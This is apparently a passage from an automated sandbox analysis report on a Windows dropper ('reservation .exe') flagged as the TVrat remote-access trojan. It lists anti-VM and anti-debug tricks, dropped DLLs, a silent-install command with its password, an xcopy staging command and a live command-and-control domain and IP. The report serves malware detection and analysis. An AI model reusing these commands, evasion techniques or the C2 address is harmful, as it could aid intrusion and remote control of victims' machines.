                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Tries to delay execution (extensive OutputDebugStringW loop)
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeSection loaded: OutputDebugStringW count: 1844
                          Tries to detect virtualization through RDTSC time measurements
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeRDTSC instruction interceptor: First address: 69B27E second address: 69B284 instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeRDTSC instruction interceptor: First address: 69B284 second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F99D0E0B076h 0x00000006 sub eax, ebx 0x00000008 mov dword ptr [ebp-04h], eax 0x0000000b mov ecx, 0000000Ah 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeRDTSC instruction interceptor: First address: 69B294 second address: 69B29A instructions: 0x00000000 rdtsc 0x00000002 mov edi, edx 0x00000004 mov ebx, eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeRDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F99D0E0B076h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F99D0E0B085h 0x0000000d dec ecx 0x0000000e jne 00007F99D0E0B069h 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeRDTSC instruction interceptor: First address: 69B29A second address: 69B294 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, edx 0x00000004 jne 00007F99D0E0B076h 0x00000006 sub eax, ebx 0x00000008 cmp eax, dword ptr [ebp-04h] 0x0000000b jnle 00007F99D0E0B085h 0x0000000d mov dword ptr [ebp-04h], eax 0x00000010 dec ecx 0x00000011 jne 00007F99D0E0B069h 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeWindow / User API: threadDelayed 1296Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_10-21028
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\opus.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-PO10S.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\astrct.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\libjpeg-turbo-win.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\aw_sas32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\libjpeg-turbo-win.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\libeay32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\msvcr120.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-PDQGE.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-SJ8AI.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-8MMT6.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\opus.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\astclient.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-BI7PN.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\libcryptoMD.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\libcurl.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\aw_sas32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-HE32K.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\hatls.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\libcryptoMD.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\libcurl.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\astrct.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-K402A.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\hatls.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\msvcr120.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\fat\libeay32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-RFQHO.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-BFIN6.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-OUNKJ.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-9MCCS.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\astclient.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-MGO66.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-SSL54.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qilq\is-26KIS.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeFile opened: PhysicalDrive0Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeThread sleep count: Count: 1296 delay: -10Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 11_2_070641D8 lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_070641D8
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: VMware
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: VBoxService.exe
                          Source: reservation .tmp, 00000002.00000002.2048762588.000000000082D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: reservation .tmp, 00000002.00000002.2048762588.000000000082D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: VMWare
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: VBoxService.exeU
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2871829583.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: ast.exe, 0000000C.00000002.2954858422.0000000000CBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
                          Source: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmpProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B71EFE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B71EFE1
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6FAE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,10_2_6B6FAE50
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B71C43E mov eax, dword ptr fs:[00000030h]10_2_6B71C43E
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B721C01 mov eax, dword ptr fs:[00000030h]10_2_6B721C01
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B71EFE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B71EFE1
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B70DC3A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6B70DC3A
                          Source: C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmpProcess created: C:\Users\user\Desktop\reservation .exe "C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giuJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\qilq\*" "C:\Users\user\AppData\Roaming\fat\"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\fat\ast.exe "C:\Users\user\AppData\Roaming\fat\ast.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\reservation .exeProcess created: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp "c:\users\user\appdata\local\temp\is-4sm5o.tmp\reservation .tmp" /sl5="$2046a,7120736,816128,c:\users\user\desktop\reservation .exe" /verysilent /password=84t66giu
                          Source: C:\Users\user\Desktop\reservation .exeProcess created: C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp "c:\users\user\appdata\local\temp\is-4sm5o.tmp\reservation .tmp" /sl5="$2046a,7120736,816128,c:\users\user\desktop\reservation .exe" /verysilent /password=84t66giuJump to behavior
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWndSVW
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWnd
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWndTrayNotifyWndSV
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B71FBD1 GetSystemTimeAsFileTime,10_2_6B71FBD1
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: ast.exe, 0000000B.00000003.2864608852.0000000007062000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: PROCEXP.EXE

                          Stealing of Sensitive Information

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 3380, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fat\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6F6D50 socket,socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,curl_msnprintf,send,recv,closesocket,closesocket,closesocket,closesocket,closesocket,10_2_6B6F6D50
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6C39A0 curl_pushheader_bynum,inet_pton,htons,inet_pton,htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,10_2_6B6C39A0
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6CEEA0 ___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,inet_pton,_strncpy,___from_strstr_to_strchr,___from_strstr_to_strchr,curl_pushheader_bynum,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,curl_msnprintf,curl_easy_strerror,curl_easy_strerror,10_2_6B6CEEA0

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts2
                          Windows Management Instrumentation                          		1
                          Scripting                          		1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		OS Credential Dumping1
                          System Time Discovery                          		Remote Services12
                          Archive Collected Data                          		1
                          Ingress Tool Transfer                          		Exfiltration Over Other Network Medium1
                          Data Encrypted for Impact
                          CredentialsDomainsDefault Accounts1
                          Native API                          		1
                          DLL Side-Loading                          		12
                          Process Injection                          		13
                          Obfuscated Files or Information                          		LSASS Memory3
                          File and Directory Discovery                          		Remote Desktop ProtocolData from Removable Media21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts12
                          Command and Scripting Interpreter                          		1
                          Registry Run Keys / Startup Folder                          		1
                          Registry Run Keys / Startup Folder                          		1
                          Software Packing                          		Security Account Manager113
                          System Information Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          DLL Side-Loading                          		NTDS331
                          Security Software Discovery                          		Distributed Component Object ModelInput Capture2
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                          Masquerading                          		LSA Secrets22
                          Virtualization/Sandbox Evasion                          		SSHKeylogging3
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                          Virtualization/Sandbox Evasion                          		Cached Domain Credentials2
                          Process Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                          Process Injection                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem2
                          System Owner/User Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558751 Sample: reservation                ... Startdate: 19/11/2024 Architecture: WINDOWS Score: 84 66 id.xn--80akicokc0aablc.xn--p1ai 2->66 76 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->76 78 Yara detected TVrat 2->78 80 Sigma detected: Suspicious Double Extension File Execution 2->80 82 Uses an obfuscated file name to hide its real file extension (a lot of spaces) 2->82 11 reservation                                               .exe 2 2->11         started        14 ast.exe 4 2->14         started        16 ast.exe 4 2->16         started        signatures3 process4 file5 52 reservation       ...               .tmp, PE32 11->52 dropped 18 reservation                                               .tmp 3 14 11->18         started        process6 file7 38 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 18->38 dropped 40 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 18->40 dropped 21 reservation                                               .exe 2 18->21         started        process8 file9 42 reservation       ...               .tmp, PE32 21->42 dropped 24 reservation                                               .tmp 5 37 21->24         started        process10 file11 44 C:\Users\user\AppData\...\quartz.dll (copy), PE32 24->44 dropped 46 C:\Users\user\AppData\...\opus.dll (copy), PE32 24->46 dropped 48 C:\Users\user\...\libssl-1_1.dll (copy), PE32 24->48 dropped 50 29 other files (24 malicious) 24->50 dropped 27 cmd.exe 2 24->27         started        process12 process13 29 xcopy.exe 24 27->29         started        32 ast.exe 25 4 27->32         started        36 conhost.exe 27->36         started        dnsIp14 54 C:\Users\user\AppData\Roaming\...\quartz.dll, PE32 29->54 dropped 56 C:\Users\user\AppData\Roaming\fat\opus.dll, PE32 29->56 dropped 58 C:\Users\user\AppData\...\libssl-1_1.dll, PE32 29->58 dropped 60 12 other files (11 malicious) 29->60 dropped 62 id.xn--80akicokc0aablc.xn--p1ai 212.193.169.65, 443, 44335, 49979 SAFIB-ASRU Russian Federation 32->62 64 127.0.0.1 unknown unknown 32->64 68 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 32->68 70 Tries to delay execution (extensive OutputDebugStringW loop) 32->70 72 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 32->72 74 Tries to detect virtualization through RDTSC time measurements 32->74 file15 signatures16

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          reservation .exe8%ReversingLabs

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-BE9V9.tmp\_isetup\_setup64.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-I3C98.tmp\_isetup\_setup64.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\AstCrp.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\ast.exe (copy)12%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\astclient.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\astrct.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\aw_sas32.dll (copy)4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\hatls.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-26KIS.tmp4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-5KIJJ.tmp12%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-8MMT6.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-9MCCS.tmp4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-BFIN6.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-BI7PN.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-HE32K.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-K402A.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-MGO66.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-OUNKJ.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-PDQGE.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-RFQHO.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-SJ8AI.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\is-SSL54.tmp0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\libcrypto-1_1.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\libcryptoMD.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\libcurl.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\libeay32.dll (copy)4%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\libjpeg-turbo-win.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\libssl-1_1.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\msvcr120.dll (copy)0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\qilq\opus.dll (copy)0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://id.xn--80akicokc0aablc.xn--p1ai:4439c00%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aai0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443g0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiheGu0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:44335-0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443lnJm&0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aie030%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443lnd0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiexe030%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai4j10%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aifgGu0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aim;0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443-0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aierW0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiget0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443ln0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ait.exeje0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:44335y0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aigiGu0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443lnmm0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesy0%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesw0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aiZ0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ait.exe0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443dm0%Avira URL Cloudsafe
                          http://jrsoftware.github.io/issrc/ISHelp/isxfunc.xml0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443...430%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aid0030%Avira URL Cloudsafe
                          http://www.borland.com/namespaces/Typesbcrypt0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ainkEx0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aid0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aii0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1aie0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai30%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443gD0%Avira URL Cloudsafe
                          http://solicecare.website/de37/update.phph?0%Avira URL Cloudsafe
                          https://id.xn--8X0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443gE0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aa0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai:443gW0%Avira URL Cloudsafe
                          https://id.xn--80akicokc0aablc.xn--p1ai.dllC;10%Avira URL Cloudsafe
